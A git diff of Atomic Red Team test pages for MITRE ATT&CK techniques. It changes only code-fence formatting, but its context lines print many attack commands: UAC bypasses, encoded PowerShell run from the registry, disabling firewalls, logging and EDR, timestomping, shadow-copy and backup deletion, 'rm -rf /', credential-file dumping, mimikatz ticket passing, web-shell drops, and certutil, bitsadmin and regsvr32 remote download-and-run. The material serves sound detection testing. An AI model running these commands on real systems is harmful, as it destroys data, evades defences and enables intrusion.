@@ -239,8 +228,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md
index eb6b877a..13806a0c 100644
--- a/atomics/T1087/T1087.md
+++ b/atomics/T1087/T1087.md
@@ -54,8 +54,7 @@ Enumerate all accounts by copying /etc/passwd to another file
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat /etc/passwd > #{output_file}
```
@@ -72,8 +71,7 @@ xxx (requires root)
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat /etc/sudoers > #{output_file}
```
@@ -90,8 +88,7 @@ View accounts wtih UID 0
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
grep 'x:0:' /etc/passwd > #{output_file} - name: List opened files by user
```
@@ -103,8 +100,7 @@ List opened files by user
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
@@ -121,8 +117,7 @@ Show if a user account has ever logger in remotely
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
lastlog > #{output_file}
```
@@ -134,8 +129,7 @@ Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
groups
id
```
@@ -148,8 +142,7 @@ Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
@@ -165,8 +158,7 @@ Enumerate all accounts
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net user
net user /domain
dir c:\Users\
@@ -183,8 +175,7 @@ Enumerate all accounts via PowerShell
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
net user
net user /domain
get-localuser
@@ -206,8 +197,7 @@ Enumerate logged on users
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
query user
```
@@ -219,8 +209,7 @@ Enumerate logged on users via PowerShell
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
query user
```
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
index 45b94964..679cf329 100644
--- a/atomics/T1088/T1088.md
+++ b/atomics/T1088/T1088.md
@@ -34,8 +34,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
@@ -53,8 +52,7 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
@@ -73,8 +71,7 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
@@ -93,8 +90,7 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 58e645b2..72cc56f0 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -33,8 +33,7 @@ Disables the iptables firewall
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
@@ -55,8 +54,7 @@ Disables syslog collection
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
@@ -75,8 +73,7 @@ Disable the Cb Response service
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
@@ -95,8 +92,7 @@ Disables SELinux enforcement
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
setenforce 0
```
@@ -108,8 +104,7 @@ Disables Carbon Black Response
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
@@ -121,8 +116,7 @@ Disables LittleSnitch
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
@@ -134,8 +128,7 @@ Disables OpenDNS Umbrella
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
@@ -152,8 +145,7 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
fltmc.exe unload #{sysmon_driver}
```
@@ -171,8 +163,7 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
@@ -184,8 +175,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
sysmon -u
```
diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md
index cbf73a16..fe5296e0 100644
--- a/atomics/T1090/T1090.md
+++ b/atomics/T1090/T1090.md
@@ -31,8 +31,7 @@ Note that this test may conflict with pre-existing system configuration.
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
export #{proxy_scheme}_proxy=#{proxy_server}
```
diff --git a/atomics/T1096/T1096.md b/atomics/T1096/T1096.md
index 46d1ac83..da71b4a2 100644
--- a/atomics/T1096/T1096.md
+++ b/atomics/T1096/T1096.md
@@ -26,8 +26,7 @@ Execute from Alternate Streams
|------|-------------|------|---------------|
| path | Path of ADS file | path | c:\ADS\|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
diff --git a/atomics/T1097/T1097.md b/atomics/T1097/T1097.md
index 02d2b600..84ecd61d 100644
--- a/atomics/T1097/T1097.md
+++ b/atomics/T1097/T1097.md
@@ -27,8 +27,7 @@ Similar to PTH, but attacking Kerberos
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index be4dab0b..ba9b7115 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -15,8 +15,7 @@ Manipulate Admin Account Name
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md
index 8d1f2314..739f6599 100644
--- a/atomics/T1099/T1099.md
+++ b/atomics/T1099/T1099.md
@@ -32,8 +32,7 @@ Stomps on the access timestamp of a file
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
touch -a -t 197001010000.00 #{target_filename}
```
@@ -50,8 +49,7 @@ Stomps on the modification timestamp of a file
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
touch -m -t 197001010000.00 #{target_filename}
```
@@ -71,8 +69,7 @@ Sudo or root privileges are required to change date. Use with caution.
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
@@ -96,8 +93,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
touch -acmr #{reference_file_path} {target_file_path}
```
@@ -117,8 +113,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
@@ -138,8 +133,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
@@ -159,8 +153,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md
index 9f2ac967..0dbc17b7 100644
--- a/atomics/T1100/T1100.md
+++ b/atomics/T1100/T1100.md
@@ -25,8 +25,7 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
xcopy #{web_shells} #{web_shell_path}
```
diff --git a/atomics/T1101/T1101.md b/atomics/T1101/T1101.md
index dd62804c..45c1b52e 100644
--- a/atomics/T1101/T1101.md
+++ b/atomics/T1101/T1101.md
@@ -20,8 +20,7 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
diff --git a/atomics/T1103/T1103.md b/atomics/T1103/T1103.md
index 5c34338e..06389b36 100644
--- a/atomics/T1103/T1103.md
+++ b/atomics/T1103/T1103.md
@@ -22,8 +22,7 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
|------|-------------|------|---------------|
| registry_file | Windows Registry File | Path | T1103.reg|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe import #{registry_file}
```
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 4bd3477f..6337796e 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -41,8 +41,7 @@ Utilize rsync to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
@@ -62,8 +61,7 @@ Utilize rsync to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive rsync | Path | /tmp/victim-files|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
@@ -83,8 +81,7 @@ Utilize scp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
@@ -104,8 +101,7 @@ Utilize scp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -125,8 +121,7 @@ Utilize sftp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
@@ -146,8 +141,7 @@ Utilize sftp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -165,8 +159,7 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
@@ -184,8 +177,7 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
@@ -209,8 +201,7 @@ This technique is used by Qbot malware to download payloads.
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md
index b72842d2..193d78d4 100644
--- a/atomics/T1107/T1107.md
+++ b/atomics/T1107/T1107.md
@@ -44,8 +44,7 @@ Delete a single file from the temporary directory
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm -f #{file_to_delete}
```
@@ -62,8 +61,7 @@ Recursively delete the temporary directory and all files contained within it
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm -rf #{folder_to_delete}
```
@@ -80,8 +78,7 @@ Use the `shred` command to overwrite the temporary file and then delete it
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
shred -u #{file_to_shred}
```
@@ -98,8 +95,7 @@ Delete a single file from the temporary directory using cmd.exe
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
del /f #{file_to_delete}
```
@@ -116,8 +112,7 @@ Recursively delete the temporary directory and all files contained within it usi
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
del /f /S #{folder_to_delete}
```
@@ -134,8 +129,7 @@ Delete a single file from the temporary directory using Powershell
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Remove-Item -path "#{file_to_delete}"
```
@@ -152,8 +146,7 @@ Recursively delete the temporary directory and all files contained within it usi
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Remove-Item -path "#{folder_to_delete}" -recurse
```
@@ -165,8 +158,7 @@ Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe Delete Shadows /All /Quiet
```
@@ -178,8 +170,7 @@ Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic shadowcopy delete
```
@@ -191,8 +182,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
@@ -205,8 +195,7 @@ This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wbadmin delete catalog -quiet
```
@@ -218,8 +207,7 @@ This test deletes the entire root filesystem of a Linux system. This technique w
**Supported Platforms:** Linux, CentOS, Ubuntu
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
diff --git a/atomics/T1110/T1110.md b/atomics/T1110/T1110.md
index 3688a13c..ceb3c7ba 100644
--- a/atomics/T1110/T1110.md
+++ b/atomics/T1110/T1110.md
@@ -47,8 +47,7 @@ Creates username and password files then attempts to brute force on remote host
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 06ad2d53..f47edeb8 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -25,8 +25,7 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
@@ -39,8 +38,7 @@ CMD is ran as Administrative rights.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
@@ -52,8 +50,7 @@ Modify a registry key of each user profile not currently loaded on the machine u
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index 01bf29ce..b5f3eb36 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -35,8 +35,7 @@ Use screencapture command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
screencapture
```
@@ -54,8 +53,7 @@ Use screencapture command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
screencapture -x
```
@@ -73,8 +71,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
| output_file | xxx
| Path | desktop.xwd|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
xwd -root -out #{output_file}
xwud -in #{output_file}
```
@@ -93,8 +90,7 @@ Use import command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
import -window root
```
diff --git a/atomics/T1114/T1114.md b/atomics/T1114/T1114.md
index 555a6561..b010105c 100644
--- a/atomics/T1114/T1114.md
+++ b/atomics/T1114/T1114.md
@@ -21,8 +21,7 @@ Search through local Outlook installation, extract mail, compress the contents,
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index d19b23f9..a7bbce56 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -25,8 +25,7 @@ Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dir | clip
clip < readme.txt
```
@@ -39,8 +38,7 @@ Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
echo Get-Process | clip
Get-Clipboard | iex
```
diff --git a/atomics/T1117/T1117.md b/atomics/T1117/T1117.md
index c6c237ae..feba33a3 100644
--- a/atomics/T1117/T1117.md
+++ b/atomics/T1117/T1117.md
@@ -30,8 +30,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| filename | Name of the local file, include path. | Path | C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
regsvr32.exe /s /u /i:#{filename} scrobj.dll
```
@@ -48,8 +47,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
@@ -66,8 +64,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md
index 147e1b2e..940ac5a1 100644
--- a/atomics/T1118/T1118.md
+++ b/atomics/T1118/T1118.md
@@ -24,8 +24,7 @@ Executes the Uninstall Method
|------|-------------|------|---------------|
| filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
```
@@ -43,8 +42,7 @@ Executes the Uninstall Method
|------|-------------|------|---------------|
| filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}
```
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index f4ff6359..f5644b27 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -19,8 +19,7 @@ Automated Collection
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
```
@@ -33,8 +32,7 @@ Automated Collection
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md
index cb09261a..574af610 100644
--- a/atomics/T1121/T1121.md
+++ b/atomics/T1121/T1121.md
@@ -25,8 +25,7 @@ Executes the Uninstall Method, No Admin Rights Required
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
@@ -46,8 +45,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
